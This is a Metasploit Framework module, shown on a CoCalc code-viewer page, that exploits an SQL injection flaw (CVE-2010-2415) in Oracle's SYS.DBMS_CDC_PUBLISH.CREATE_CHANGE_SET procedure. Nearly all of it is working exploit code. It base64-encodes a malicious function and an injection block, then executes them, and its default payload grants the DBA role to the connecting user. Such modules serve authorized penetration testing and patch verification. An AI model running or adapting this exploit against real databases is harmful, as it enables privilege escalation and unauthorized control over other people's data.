CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET',

12
      'Description'    => %q{

13
          The module exploits an sql injection flaw in the CREATE_CHANGE_SET

14
        procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege

15
        on the vulnerable package can exploit this vulnerability. By default, users granted

16
        EXECUTE_CATALOG_ROLE have the required privilege.

17
      },

18
      'Author'         => [ 'MC' ],

19
      'License'        => MSF_LICENSE,

20
      'References'     =>

21
        [

22
          [ 'CVE', '2010-2415' ],

23
          [ 'OSVDB', '70078'],

24
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html' ],

25
        ],

26
      'DisclosureDate' => '2010-10-13'))

27


28
    register_options(

29
      [

30
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),

31
      ])

32
  end

33


34
  def run

35


36
    return if not check_dependencies

37


38
    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

39
    var1  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

40
    var2  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

41


42
    function = "

43
CREATE OR REPLACE FUNCTION #{name}

44
RETURN VARCHAR2 AUTHID CURRENT_USER

45
IS

46
PRAGMA AUTONOMOUS_TRANSACTION;

47
BEGIN

48
EXECUTE IMMEDIATE '#{datastore['SQL']}';

49
COMMIT;

50
RETURN NULL;

51
END;

52
    "

53


54
    #PROCEDURE CREATE_CHANGE_SET

55
    # Argument Name			Type			In/Out Default?

56
    # ------------------------------ ----------------------- ------ --------

57
    # CHANGE_SET_NAME		VARCHAR2		IN

58
    # DESCRIPTION			VARCHAR2		IN     DEFAULT

59
    # CHANGE_SOURCE_NAME		VARCHAR2		IN		<-boom ;)

60
    # STOP_ON_DDL			CHAR			IN     DEFAULT

61
    # BEGIN_DATE			DATE			IN     DEFAULT

62
    # END_DATE			DATE			IN     DEFAULT

63


64
    package = "

65
BEGIN

66
SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET('#{name}','#{name}','''||'||user||'.#{name}||''');

67
END;

68
    "

69


70
    uno  = Rex::Text.encode_base64(function)

71
    dos  = Rex::Text.encode_base64(package)

72


73
    encoded_sql = %Q|

74
DECLARE

75
#{var1} VARCHAR2(32767);

76
#{var2} VARCHAR2(32767);

77
BEGIN

78
#{var1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

79
EXECUTE IMMEDIATE #{var1};

80
#{var2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

81
EXECUTE IMMEDIATE #{var2};

82
END;

83
    |

84


85
    print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET...")

86
    prepare_exec(encoded_sql)

87
    print_status("Done...")

88


89
  end

90
end

91


92